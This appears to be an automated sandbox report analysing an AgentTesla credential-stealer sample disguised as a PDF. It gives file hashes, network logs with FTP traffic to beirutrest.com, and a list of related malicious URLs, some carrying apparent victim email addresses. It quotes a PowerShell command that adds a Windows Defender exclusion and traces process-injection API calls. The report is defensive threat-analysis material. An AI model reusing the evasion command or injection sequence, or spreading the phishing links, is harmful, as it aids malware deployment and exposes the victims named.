CLOUDFLARENETUS | Order requirements CIF Greece_pdf.exe | malicious | GuLoader, Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | z1MB267382625AE.exe | malicious | Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | 96c27caf-3816-d26f-4af5-19e1d76e6c15.eml | malicious | HTMLPhisher | 1.1.1.1
UNIFIEDLAYER-AS-1US | Secured Audlo_secpod.com_1524702658.html | malicious | Unknown | 69.49.245.172
UNIFIEDLAYER-AS-1US | https://floreslaherradura.com/?uid=a2FuZGVyc29uQGJxbGF3LmNvbQ== | malicious | HTMLPhisher | 192.185.3.195
UNIFIEDLAYER-AS-1US | https://1.midlifemouse.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVFXRTNlSFU9JnVpZD1VU0VSMTIxMTIwMjRVNTUxMTEyMjQ=N0123Nexample@email.com | malicious | Unknown | 67.20.112.200
UNIFIEDLAYER-AS-1US | https://lmmoye.org/file/oL/xzw/ | malicious | Unknown | 69.49.234.173
UNIFIEDLAYER-AS-1US | USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe | malicious | Remcos, DBatLoader | 216.172.172.178
UNIFIEDLAYER-AS-1US | Delivery_Notification_000275578.doc.js | malicious | Unknown | 162.241.225.96
UNIFIEDLAYER-AS-1US | USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader | 216.172.172.178
UNIFIEDLAYER-AS-1US | New Order - RCII900718_Contract Drafting.exe | malicious | FormBook | 108.179.253.197
UNIFIEDLAYER-AS-1US | arm7.nn-20241120-0508.elf | malicious | Mirai, Okiru | 162.144.165.86
UNIFIEDLAYER-AS-1US | http://www.dvdcollections.co.uk/search/redirect.php?deeplink=https://lp-engenharia.com/zerooo/?email=mwright@burbankca.gov | malicious | HTMLPhisher | 50.116.87.139
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Wire slip account payable.pif.exe | malicious | AgentTesla | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | Order requirements CIF Greece_pdf.exe | malicious | GuLoader, Snake Keylogger | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com | malicious | Unknown | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | DATASHEET.exe | malicious | AgentTesla | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | datasheet.exe | malicious | AgentTesla | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | datasheet.exe | malicious | AgentTesla | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | ORDER 20240986 OA.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | PO#8329837372938383839238PDF.exe | malicious | XWorm | 104.26.12.205
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC | 104.26.12.205
                                                            No context
                                                            Process:C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1172
                                                            Entropy (8bit):5.3550249375369265
                                                            Encrypted:false
                                                            SSDEEP:24:3OWSKco4KmZjKbmOIKod6emZ9tYs4RPQoUEJ0gt/NKIl9iagu:eWSU4xympjmZ9tz4RIoUl8NDv
                                                            MD5:D66C47B8DC1712C9019C2CA1A29A7224
                                                            SHA1:027D8E43DB55EB21BE139D06CCAD686648485565
                                                            SHA-256:217A7B18569319440E4C429C91D9ECD917765DF0037D0CD19E3072BE7126BC38
                                                            SHA-512:B2121B19348C8DD0204496EDA12D3416BE199284A307A13FEC0A7FD8FFD0F89511B9C110AE369049951ED27DD59E892153FE5E63600C3E7315A598DB5BB21F31
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.526744624549009
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                                                            File size:979'456 bytes
                                                            MD5:56507d8fc1346411ed4fdbecb4589ec8
                                                            SHA1:a7d542484247819e9037cbd913b8ad1b68b0dad6
                                                            SHA256:ad3517d5640b93e40bc1e839f6616222801d06dd83ed5887462a71f3858f5b40
                                                            SHA512:c31e23a032d3551bb17a5bbfdff585ec57f308397739b807c08b082513d63c1984d8cf0a4cd65c2f0863e6ebec0766f161abe6a8860c65a1e44619097cb77e7b
                                                            SSDEEP:12288:9csCELA+12Hd5lpvS36pDfi/xN3xoAS4zxPVzxWWavQ8qiNRJEvhsEY72k2uDF+d:rzxdzxWpq8JE9ePD47tdTmTX
                                                            TLSH:A525B02077F89E67E27AA1F3EB84425097B6D141767BE39A4CC564CE26C27320783D27
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*.>g..............0......(........... ........@.. .......................`............@................................
                                                            Icon Hash:130b253d1931012d
                                                            Entrypoint:0x4ee6e6
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x673E9B2A [Thu Nov 21 02:30:02 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0xee694 | 0x4f | .text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf0000 | 0x2588 | .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf4000 | 0xc | .reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                            .text | 0x2000 | 0xec6ec | 0xec800 | d16a37cb289f1e668a0c69ca5a2f8ee0 | False | 0.7367111109275899 | data | 7.528842413573355 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc | 0xf0000 | 0x2588 | 0x2600 | 50038f86c56e4d33d10d5412d21b5c17 | False | 0.8748972039473685 | data | 7.577073429096482 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc | 0xf4000 | 0xc | 0x200 | 4c41e5d352a398611a9e058992080527 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                            RT_ICON | 0xf0100 | 0x2016 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9504504504504504
                                                            RT_GROUP_ICON | 0xf2128 | 0x14 | data | | | 1.05
                                                            RT_VERSION | 0xf214c | 0x23c | data | | | 0.47027972027972026
                                                            RT_MANIFEST | 0xf2398 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                            DLL | Import
                                                            mscoree.dll | _CorExeMain
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Nov 21, 2024 11:51:06.184916019 CET | 49709 | 443 | 192.168.2.8 | 104.26.12.205
                                                            Nov 21, 2024 11:51:06.184954882 CET | 443 | 49709 | 104.26.12.205 | 192.168.2.8
                                                            Nov 21, 2024 11:51:06.185022116 CET | 49709 | 443 | 192.168.2.8 | 104.26.12.205
                                                            Nov 21, 2024 11:51:06.194443941 CET | 49709 | 443 | 192.168.2.8 | 104.26.12.205
                                                            Nov 21, 2024 11:51:06.194474936 CET | 443 | 49709 | 104.26.12.205 | 192.168.2.8
                                                            Nov 21, 2024 11:51:07.456192970 CET | 443 | 49709 | 104.26.12.205 | 192.168.2.8
                                                            Nov 21, 2024 11:51:07.456265926 CET | 49709 | 443 | 192.168.2.8 | 104.26.12.205
                                                            Nov 21, 2024 11:51:07.458792925 CET | 49709 | 443 | 192.168.2.8 | 104.26.12.205
                                                            Nov 21, 2024 11:51:07.458798885 CET | 443 | 49709 | 104.26.12.205 | 192.168.2.8
                                                            Nov 21, 2024 11:51:07.459073067 CET | 443 | 49709 | 104.26.12.205 | 192.168.2.8
                                                            Nov 21, 2024 11:51:07.510687113 CET | 49709 | 443 | 192.168.2.8 | 104.26.12.205
                                                            Nov 21, 2024 11:51:07.521538973 CET | 49709 | 443 | 192.168.2.8 | 104.26.12.205
                                                            Nov 21, 2024 11:51:07.563329935 CET | 443 | 49709 | 104.26.12.205 | 192.168.2.8
                                                            Nov 21, 2024 11:51:07.904660940 CET | 443 | 49709 | 104.26.12.205 | 192.168.2.8
                                                            Nov 21, 2024 11:51:07.904746056 CET | 443 | 49709 | 104.26.12.205 | 192.168.2.8
                                                            Nov 21, 2024 11:51:07.904884100 CET | 49709 | 443 | 192.168.2.8 | 104.26.12.205
                                                            Nov 21, 2024 11:51:07.910940886 CET | 49709 | 443 | 192.168.2.8 | 104.26.12.205
                                                            Nov 21, 2024 11:51:09.581499100 CET | 49711 | 21 | 192.168.2.8 | 50.87.144.157
                                                            Nov 21, 2024 11:51:09.701241970 CET | 21 | 49711 | 50.87.144.157 | 192.168.2.8
                                                            Nov 21, 2024 11:51:09.701442957 CET | 49711 | 21 | 192.168.2.8 | 50.87.144.157
                                                            Nov 21, 2024 11:51:09.707833052 CET | 49711 | 21 | 192.168.2.8 | 50.87.144.157
                                                            Nov 21, 2024 11:51:09.827406883 CET | 21 | 49711 | 50.87.144.157 | 192.168.2.8
                                                            Nov 21, 2024 11:51:09.827860117 CET | 49711 | 21 | 192.168.2.8 | 50.87.144.157
                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Nov 21, 2024 11:51:05.948193073 CET | 64351 | 53 | 192.168.2.8 | 1.1.1.1
                                                            Nov 21, 2024 11:51:06.178083897 CET | 53 | 64351 | 1.1.1.1 | 192.168.2.8
                                                            Nov 21, 2024 11:51:09.058645010 CET | 64993 | 53 | 192.168.2.8 | 1.1.1.1
                                                            Nov 21, 2024 11:51:09.579471111 CET | 53 | 64993 | 1.1.1.1 | 192.168.2.8
                                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                            Nov 21, 2024 11:51:05.948193073 CET | 192.168.2.8 | 1.1.1.1 | 0x76a2 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                                            Nov 21, 2024 11:51:09.058645010 CET | 192.168.2.8 | 1.1.1.1 | 0x4be9 | Standard query (0) | beirutrest.com | A (IP address) | IN (0x0001) | false
                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                            Nov 21, 2024 11:51:06.178083897 CET | 1.1.1.1 | 192.168.2.8 | 0x76a2 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                                            Nov 21, 2024 11:51:06.178083897 CET | 1.1.1.1 | 192.168.2.8 | 0x76a2 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                                            Nov 21, 2024 11:51:06.178083897 CET | 1.1.1.1 | 192.168.2.8 | 0x76a2 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                                            Nov 21, 2024 11:51:09.579471111 CET | 1.1.1.1 | 192.168.2.8 | 0x4be9 | No error (0) | beirutrest.com | | 50.87.144.157 | A (IP address) | IN (0x0001) | false
                                                            • api.ipify.org
                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.8 | 49709 | 104.26.12.205 | 443 | 7684 | C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-11-21 10:51:07 UTC | 155 | OUT | GET / HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                Host: api.ipify.org
                                                                Connection: Keep-Alive
                                                            2024-11-21 10:51:07 UTC | 399 | IN | HTTP/1.1 200 OK
                                                                Date: Thu, 21 Nov 2024 10:51:07 GMT
                                                                Content-Type: text/plain
                                                                Content-Length: 11
                                                                Connection: close
                                                                Vary: Origin
                                                                CF-Cache-Status: DYNAMIC
                                                                Server: cloudflare
                                                                CF-RAY: 8e601f6d4ff019ae-EWR
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1895&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1492842&cwnd=224&unsent_bytes=0&cid=799422a1c4478dcd&ts=457&x=0"
                                                            2024-11-21 10:51:07 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                Data Ascii: 8.46.123.75


                                                            Target ID:0
                                                            Start time:05:51:02
                                                            Start date:21/11/2024
                                                            Path:C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
                                                            Imagebase:0x820000
                                                            File size:979'456 bytes
                                                            MD5 hash:56507D8FC1346411ED4FDBECB4589EC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:05:51:03
                                                            Start date:21/11/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
                                                            Imagebase:0xec0000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:05:51:03
                                                            Start date:21/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:05:51:03
                                                            Start date:21/11/2024
                                                            Path:C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
                                                            Imagebase:0xd10000
                                                            File size:979'456 bytes
                                                            MD5 hash:56507D8FC1346411ED4FDBECB4589EC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3862005678.000000000327C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3862005678.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.3862005678.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                              Execution Graph

                                                              Execution Coverage:8.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:199
                                                              Total number of Limit Nodes:15
                                                              execution_graph 21633 5839fa0 21634 583a12b 21633->21634 21635 5839fc6 21633->21635 21635->21634 21637 5835e40 21635->21637 21638 583a220 PostMessageW 21637->21638 21639 583a28c 21638->21639 21639->21635 21640 115d5f0 DuplicateHandle 21641 115d686 21640->21641 21642 115cfa0 21643 115cfe6 GetCurrentProcess 21642->21643 21645 115d031 21643->21645 21646 115d038 GetCurrentThread 21643->21646 21645->21646 21647 115d075 GetCurrentProcess 21646->21647 21648 115d06e 21646->21648 21649 115d0ab 21647->21649 21648->21647 21650 115d0d3 GetCurrentThreadId 21649->21650 21651 115d104 21650->21651 21652 583821a 21653 5838220 21652->21653 21658 5838d38 21653->21658 21673 5838dae 21653->21673 21689 5838d48 21653->21689 21654 5838275 21660 5838d3c 21658->21660 21659 5838d14 21659->21654 21660->21659 21703 58391b6 21660->21703 21707 5839431 21660->21707 21712 5839343 21660->21712 21716 583962e 21660->21716 21721 5839238 21660->21721 21727 5839458 21660->21727 21732 583949a 21660->21732 21737 58396aa 21660->21737 21742 583974b 21660->21742 21747 58395db 21660->21747 21751 5839256 21660->21751 21661 5838d6a 21661->21654 21675 5838d3c 21673->21675 21677 5838db1 21673->21677 21674 5838d14 21674->21654 21675->21674 21678 5839343 2 API calls 21675->21678 21679 5839431 2 API calls 21675->21679 21680 58391b6 2 API calls 21675->21680 21681 5839256 2 API calls 21675->21681 21682 58395db 2 API calls 21675->21682 21683 583974b 2 API calls 21675->21683 21684 58396aa 2 API calls 21675->21684 21685 583949a 2 API calls 21675->21685 21686 5839458 2 API calls 21675->21686 21687 5839238 2 API calls 21675->21687 21688 583962e 2 API calls 21675->21688 21676 5838d6a 21676->21654 21677->21654 21678->21676 21679->21676 21680->21676 21681->21676 21682->21676 21683->21676 21684->21676 21685->21676 21686->21676 21687->21676 21688->21676 21690 5838d62 21689->21690 21692 5839343 2 API calls 21690->21692 21693 5839431 2 API calls 21690->21693 21694 
58391b6 2 API calls 21690->21694 21695 5839256 2 API calls 21690->21695 21696 58395db 2 API calls 21690->21696 21697 583974b 2 API calls 21690->21697 21698 58396aa 2 API calls 21690->21698 21699 583949a 2 API calls 21690->21699 21700 5839458 2 API calls 21690->21700 21701 5839238 2 API calls 21690->21701 21702 583962e 2 API calls 21690->21702 21691 5838d6a 21691->21654 21692->21691 21693->21691 21694->21691 21695->21691 21696->21691 21697->21691 21698->21691 21699->21691 21700->21691 21701->21691 21702->21691 21755 5837a58 21703->21755 21759 5837a4d 21703->21759 21708 5839437 21707->21708 21763 5837580 21708->21763 21767 5837588 21708->21767 21709 583972c 21771 5837630 21712->21771 21775 5837638 21712->21775 21713 5839362 21713->21661 21717 5839634 21716->21717 21718 5839a47 21717->21718 21779 58377d0 21717->21779 21783 58377c8 21717->21783 21722 5839211 21721->21722 21723 5839438 21721->21723 21722->21661 21725 5837580 ResumeThread 21723->21725 21726 5837588 ResumeThread 21723->21726 21724 583972c 21725->21724 21726->21724 21728 583947b 21727->21728 21730 58377d0 WriteProcessMemory 21728->21730 21731 58377c8 WriteProcessMemory 21728->21731 21729 583955d 21729->21661 21730->21729 21731->21729 21733 5839645 21732->21733 21734 5839a47 21733->21734 21735 58377d0 WriteProcessMemory 21733->21735 21736 58377c8 WriteProcessMemory 21733->21736 21735->21733 21736->21733 21738 58396bb 21737->21738 21740 58377d0 WriteProcessMemory 21738->21740 21741 58377c8 WriteProcessMemory 21738->21741 21739 58396e1 21739->21661 21740->21739 21741->21739 21743 583975d 21742->21743 21787 5837710 21743->21787 21791 5837709 21743->21791 21744 5839ab8 21749 5837630 Wow64SetThreadContext 21747->21749 21750 5837638 Wow64SetThreadContext 21747->21750 21748 58395a0 21748->21661 21749->21748 21750->21748 21795 58378c0 21751->21795 21799 58378b8 21751->21799 21752 5839229 21756 5837ae1 21755->21756 21756->21756 21757 5837c46 CreateProcessA 21756->21757 21758 5837ca3 21757->21758 21758->21758 21760 
